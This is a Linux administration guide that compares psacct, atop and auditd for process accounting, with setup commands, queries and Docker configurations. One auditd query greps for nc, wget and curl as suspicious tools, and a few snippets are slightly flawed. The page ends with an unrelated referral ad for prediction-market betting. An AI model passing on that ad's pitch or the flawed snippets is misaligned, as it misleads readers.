Introduction

Knowing exactly what ran on your server, who executed it, and how many resources it consumed is fundamental to both security auditing and capacity planning. Linux process accounting provides this forensic trail — recording every command executed, its resource usage, and termination status.

This guide compares three approaches to process accounting: psacct (the classic BSD-style accounting suite), atop (the advanced system/process monitor with daemon mode), and auditd (the Linux Audit Framework for security-focused process tracking). Each serves different use cases — from compliance auditing to real-time anomaly detection.

Comparison Table

Featurepsacct (acct)atop (atopacctd)auditd process tracking
Packageacct or psacctatopauditd (built into kernel)
Data FormatBinary /var/log/account/pacctBinary raw log + ASCII dailyBinary audit logs
Query Toollastcomm, sa, acatop -r, atopsarausearch, aureport
GranularityProcess exit onlyPeriodic sampling + exitSyscall-level
Resource TrackingCPU, memory, I/OCPU, memory, disk, networkSyscall args, UID, path
Overhead~1-2% CPU~2-5% CPU (daemon)5-15% (config-dependent)
Storage per day~10-50 MB~50-200 MB100 MB - 5+ GB
Best ForCompliance, usage billingPerformance trendingSecurity forensics
Docker SupportHost-levelHost + container statsHost-level
Real-time AlertsNoVia atop’s triggerVia audisp plugins

psacct: Classic BSD Process Accounting

psacct (package name acct on Debian, psacct on RHEL) is the traditional Unix process accounting system. It records every process that terminates, who ran it, and its resource consumption.

Installation

1
2
3
4
5
6
7
8
9

# Debian/Ubuntu
sudo apt install acct

# RHEL/Fedora
sudo dnf install psacct

# Enable and start
sudo systemctl enable --now acct.service
# Or: sudo /usr/sbin/accton /var/log/account/pacct

Querying Accounting Data

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

# Show recently executed commands per user
lastcomm | head -20

# Show command summary with CPU time
sa -m

# Per-user accounting report
sa -u | head -20

# Show total connect time
ac -p

# Show daily totals
ac -d

# Find commands run by specific user
lastcomm --user www-data

# Top 10 CPU-consuming commands
sa -c | sort -rnk4 | head -10

Docker-Based Process Accounting Dashboard

For centralized collection from multiple servers, deploy a web dashboard:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

version: "3.8"
services:
acct-collector:
image: alpine:latest
container_name: acct-collector
command: |
sh -c 'apk add --no-cache fcgiwrap spawn-fcgi nginx &&
spawn-fcgi -s /run/fcgiwrap.sock -u nginx -g nginx /usr/bin/fcgiwrap &&
nginx -g "daemon off;"'
volumes:
- /var/log/account:/data/acct:ro
- ./nginx-acct.conf:/etc/nginx/http.d/default.conf
ports:
- "8081:80"

NGINX config for the dashboard (nginx-acct.conf):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

server {
listen 80;
location / {
root /data;
autoindex on;
}
location /query {
fastcgi_pass unix:/run/fcgiwrap.sock;
fastcgi_param SCRIPT_FILENAME /usr/local/bin/acct-query.sh;
include fastcgi_params;
}
}

Log Rotation and Retention

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# /etc/logrotate.d/psacct
/var/log/account/pacct {
monthly
rotate 12
compress
missingok
postrotate
/usr/sbin/accton /var/log/account/pacct
endscript
}

atop: Advanced Performance Monitor with Process Accounting

atop operates as both an interactive performance monitor and a daemon (atopacctd) that records system-wide and per-process statistics at regular intervals. Unlike psacct which waits for process exit, atop samples active processes — capturing short-lived processes that psacct might miss if they crash without proper exit accounting.

Installation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Debian/Ubuntu
sudo apt install atop

# Enable process accounting daemon
sudo systemctl enable --now atopacct.service

# Or: sudo atopacctd

# RHEL/Fedora
sudo dnf install atop
sudo systemctl enable --now atop

Docker Deployment for Centralized Collection

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

version: "3.8"
services:
atopd:
image: debian:bookworm-slim
container_name: atop-collector
pid: host
privileged: true
command: |
sh -c 'apt-get update && apt-get install -y atop cron &&
mkdir -p /var/log/atop &&
atopacctd &&
crond -f'
volumes:
- /var/log/atop:/var/log/atop
- /proc:/host-proc:ro
environment:
- INTERVAL=60
- LOGINTERVAL=600

Querying atop Data

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Interactive mode (current day)
atop

# Review historical data
atop -r /var/log/atop/atop_20260601

# Process accounting summary
atopsar -c    # CPU
atopsar -m    # Memory
atopsar -d    # Disk
atopsar -p 1h # Per-command starting in last hour

auditd: Security-Focused Process Tracking

auditd (Linux Audit Framework) records security-relevant events at the syscall level. For process accounting, it captures execve() syscalls along with the full command line, user ID, and terminal — providing forensic-grade detail.

Installation

1
2
3
4
5

# Debian/Ubuntu
sudo apt install auditd audispd-plugins

# RHEL/Fedora
sudo dnf install audit audit-libs

Process Tracking Rules

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# Track all command executions
sudo auditctl -a always,exit -F arch=b64 -S execve -k process-accounting
sudo auditctl -a always,exit -F arch=b32 -S execve -k process-accounting

# Make persistent
sudo tee /etc/audit/rules.d/process-accounting.rules << 'EOF'
-a always,exit -F arch=b64 -S execve -k process-accounting
-a always,exit -F arch=b32 -S execve -k process-accounting
EOF
sudo augenrules --load

Querying Process Audit Logs

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

# All command executions today
ausearch -k process-accounting --start today

# Commands run by a specific user
ausearch -k process-accounting -ui 1000 --start today

# Failed exec attempts
ausearch -k process-accounting --success no --start today

# Generate a process execution report
aureport -x --summary

# Per-user process report
aureport -x -u --start this-week

# Find suspicious commands
ausearch -k process-accounting | grep -E "nc|wget|curl" | aureport -x -i

Prometheus Integration via audisp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

# /etc/audit/plugins.d/audisp-pipe.conf
active = yes
direction = out
path = /usr/local/bin/audit-metrics.sh
type = always
format = string

# /usr/local/bin/audit-metrics.sh
#!/bin/bash
while read line; do
echo "$line" | grep -q "execve" &&         echo "audit_process_count 1" > /var/lib/node_exporter/audit.prom.tmp
done

Choosing the Right Tool

ScenarioRecommended Tool
Compliance: “track all user commands”psacct
Performance: “which commands use the most CPU?”atop + atopacctd
Security: “who ran that suspicious binary?”auditd
Resource billing: “charge per CPU-minute”psacct + sa
Real-time anomaly detectionauditd + audisp
Historical trending and capacity planningatop

Why Self-Host Process Accounting?

Process accounting data is sensitive — it contains a complete record of every command executed on your servers, including usernames, command arguments, and timing. Keeping this data on your own infrastructure ensures it is never exposed to third-party monitoring services. Self-hosting also means you control retention policies, can integrate directly with your SIEM or logging pipeline, and avoid per-host licensing costs.

For broader security monitoring context, see our auditd framework guide. For intrusion prevention, our fail2ban comparison covers complementary tools.

If you need kernel-level visibility beyond process tracking, the eBPF tracing guide covers modern observability approaches that work alongside traditional accounting.

Integration with SIEM and Log Aggregation

Process accounting data is most valuable when centralized. Forward psacct logs via Filebeat or Vector to your Elasticsearch cluster, and configure auditd to send events via audisp to a centralized syslog server. This enables cross-server correlation — for example, detecting when the same user executes a suspicious command across multiple hosts within a short time window. The combination of psacct for resource usage, auditd for forensics, and atop for performance trending provides complete operational visibility across your fleet.

FAQ

Does process accounting survive a reboot?

psacct: Yes. The binary log file persists across reboots, and accounting resumes automatically if the service is enabled. atop: Yes, logs persist in /var/log/atop/. auditd: Yes, rules in /etc/audit/rules.d/ are loaded at boot.

How much disk space does process accounting consume?

psacct typically uses 10-50 MB per day on a moderately busy server. atop uses 50-200 MB with default intervals. auditd with full execve() logging can consume 100 MB to 5+ GB per day depending on workload — configure disk space monitoring and use auditd’s max_log_file_action = rotate to prevent disk exhaustion.

Can I use process accounting inside Docker containers?

Process accounting runs at the host kernel level and captures all processes including those in containers. However, the UID mapping may differ between host and container namespaces. For container-specific accounting, use docker stats or deploy atop inside each container with host PID namespace access.

Is psacct still maintained?

The psacct/acct package is maintained in most distribution repositories as a stable, mature tool. The upstream source (GNU acct) receives minimal updates because the on-disk format is stable and the functionality is complete. For systems requiring active development, atop is updated regularly.

How does process accounting affect GDPR/privacy compliance?

Process accounting records constitute personal data under GDPR if they include usernames. You should: (1) document process accounting in your data processing registry, (2) configure retention periods, (3) restrict access to accounting logs, and (4) consider pseudonymizing usernames via auditd’s uid translation or using numeric UIDs only.

💰 想测试你的市场判断力?我用 Polymarket 做预测市场交易——这是全球最大的预测市场平台,从大选结果到 人工智能监管时间线,什么都可以押注。和赌博不同,这是真正的信息市场:你懂的信息越多,胜率越高。我靠预测 人工智能相关事件的走向已经赚了不少。用我的邀请链接注册:Polymarket.com